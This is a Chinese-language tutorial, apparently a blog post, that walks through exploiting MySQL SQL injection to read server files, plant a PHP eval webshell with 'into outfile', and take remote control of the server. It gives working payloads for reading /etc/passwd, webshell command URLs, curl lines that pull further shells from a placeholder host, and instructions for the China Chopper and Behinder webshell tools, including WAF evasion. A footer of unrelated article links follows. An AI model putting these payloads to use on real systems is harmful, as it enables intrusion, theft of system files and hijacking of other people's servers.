sql 注入 文件读写 木马植入 远程控制

sql 注入 文件读写 木马植入 远程控制

一, 检测读写权限

查看mysql全局变量

sql 复制代码
   SHOW GLOBAL VARIABLES LIKE '%secure%'

   secure_file_priv = 空, 则任意读写
   secure_file_priv = 路径, 则只能读写该路径下的文件
   secure_file_priv = NULL, 则禁止读写

二, 读取文件, 使用 load_file() 函数

先尝试读取系统常见的固定目录, 或者异常报出来目录
http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3, 
( select load_file( "/etc/passwd" )  ), 5, 6

http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3, 
( select load_file( "/opt/lampp/etc/httpd.conf" )  ), 5, 6

其他的不确定的目录与文件名可以通过 burpsuit 用字典爆破.

三, 写入一句话木马, 使用sql "into outfile" 语句

1. 先尝试写入某个目录
http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3, 
"hello world", 5, 6 into outfile "/opt/lampp/htdocs/security/mm.php" 
2. 写入后尝试用url访问这个文件, 如果404找不到对象,
可能当前目录没有写权限:
"Can't create/write to file '/opt/lampp/htdocs/security/mm.php' (Errcode: 13 "Permission denied")"
3. 继续找下一级目录继续写入测试
http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3, 
"hello world", 5, 6 into outfile "/opt/lampp/htdocs/security/test/mm.php" 
4. 测试成功, 写入一句话木马
使用eval()函数, 通过url中传入的参数字符串交给eval执行.
4.1 使用 GET 请求: "<?php @eval($_GET['cmd']);?>"
    写入木马文件到服务器
    http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3, 
    "<?php @eval($_GET['cmd']);?>", 5, 6 
    into outfile "/opt/lampp/htdocs/security/test/mm.php"     
    
    使用url访问木马文件, 传入需要执行的代码
    http://192.168.112.200/security/test/mm.php?cmd=phpinfo();
    .../mm.php?cmd=echo date('Y-m-d');
    .../mm.php?cmd=system('ifconfig');
    .../mm.php?cmd=system('cat /etc/passwd');
    # 远程下载其他木马文件
    .../mm.php?cmd=system('curl http:/xxx/xxx/xxx.php')
4.2 使用POST 请求: "<?php @eval($_POST['cmd']);?>"
    写入木马文件到服务器
    http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3, 
    "<?php @eval($_POST['cmd']);?>", 5, 6 
    into outfile "/opt/lampp/htdocs/security/test/mm.php" 
    
    使用url访问木马, 使用 POST 请求提交参数.
    URL:  http://192.168.112.200/security/test/mm.php
    DATA: cmd=system('cat /etc/passwd');

四, 远程工具: 中国菜刀

说明: 
    这是一个远程控制工具, 依赖于已经植入的木马. 
    使用中国菜刀可以方便的利用木马文件, 代替手工反复post命令来查看服务器的数据, 
    例如浏览文件目录, 数据库等等(具体能执行的命令依赖于权限, 与进一步提权有关).

准备工作:
    已经向服务器写入了post类型的一句话木马.例如:
    http://192.168.112.200/security/read.php?id=-1 union select 1, 2, 3, 
    "<?php @eval($_POST['cmd']);?>", 5, 6 
    into outfile "/opt/lampp/htdocs/security/test/mm.php" 

工具操作:
    1. 在中国菜刀的窗口空白处 [右键], [添加], 写入木马[地址], [参数名], [编码格式]等. 例如:
        地址: http://192.168.112.200/security/test/mm.php
        参数名: cmd

    2. 在添加的地址列表处 [右键], 即可选择 [文件管理], [数据库], [虚拟终端] 等功能.

缺点:
    菜刀是采用base64编码传输, 等于是明文传输, 容易被WAF进行防护.

五, 远程工具: Behinder 冰蝎

说明:
    这是一个远程控制工具, 参数采用加密传输, 不容易被WAF防护.
    服务器需要对传输的数据进行解密, 因此需要先将包含加密通信key的shell代码写入或上传到目标服务器.
    各种语言的 shell 代码在 server 文件夹中, shell 文件中记录了连接用的密钥key.
    密钥也可以自己定义, 定义规则在注释中.
    
    建议使用一句话木马通过curl将shell代码从自己的地址把文件下载到服务器上, 例如:
    .../mm.php?cmd=system('curl http:/xxx/shell.php > /opt/lampp/htdocs/security/test/shell.php')    

准备:
    1. 将shell代码传入目标服务器, 比如将 shell.php 中的代码通过一句话木马写入到服务器.
    或者有条件将shell.php 直接上传到服务器. 
    
    2. 打开behinder界面, [右键], [添加], 
        输入木马[URL], [连接密码](在shell.php文件中查看), 保存.
    
    3. 双击或者右键打开连接, 连接后默认会显示phpinfo()的信息.
相关推荐
喵叔哟5 分钟前
重构代码之移动字段
java·数据库·重构
念白4439 分钟前
智能病历xml提取
数据库·sql·oracle
qingy_204613 分钟前
【JavaWeb】JavaWeb入门之XML详解
数据库·oracle
大数据面试宝典17 分钟前
用AI来写SQL:让ChatGPT成为你的数据库助手
数据库·人工智能·chatgpt
努力的小雨22 分钟前
快速上手 KSQL:轻松与数据库交互的利器
数据库·经验分享
Gentle58624 分钟前
labview中连接sql server数据库查询语句
数据库·labview
Gentle58625 分钟前
labview用sql server数据库存取数据到一个单元格
数据库·labview
2401_8576363928 分钟前
共享汽车管理新纪元:SpringBoot框架应用
数据库·spring boot·汽车
菲兹园长29 分钟前
表的设计(MYSQL)
数据库·mysql
Java Fans44 分钟前
MySQL数据库常用命令大全(完整版——表格形式)
数据库·mysql